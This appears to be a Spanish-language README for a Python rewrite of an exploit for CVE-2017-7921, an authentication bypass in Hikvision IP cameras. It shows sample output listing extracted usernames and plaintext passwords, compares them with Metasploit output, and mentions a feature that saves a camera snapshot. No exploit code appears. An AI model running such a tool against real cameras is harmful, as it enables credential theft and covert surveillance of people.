
simple reescritura de CVE-2017-7921 en python por mí. ¡solo con fines educativos!
simple reescritura de CVE-2017-7921 en python por mí. ¡solo con fines educativos!
bastante simple, no incluí verificaciones para cosas como ips, ni verificaciones avanzadas de la respuesta y tal. Lo probé en una cámara que estoy autorizado a probar (dentro de mi red local) y parece funcionar perfectamente.
#Salida de ejemplo:
python 2017.py
found usernames: admin,defualt
admin:Pa$$W0rd
defualt:Xf07732479
Esto coincide con las credenciales que obtendríamos si usamos el mismo exploit en "msfconsole"
[*] User Credentials Information:
-----------------------------
User:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
User:defualt | ID:2 | Role:Operator | Password: Xf07732479
#fuentes detalles reales: https://medium.com/@k3yb0ard/when-you-pay-to-sell-your-own-privacy-a-technical-deep-dive-into-cve-2017-7921-hikvision-auth-576b581f4afe
cve: https://nvd.nist.gov/vuln/detail/cve-2017-7921
#actualización
también se agregó snapshot que permite obtener una instantánea de /Streaming/channels/1/picture y guardarla en un archivo ip.jpg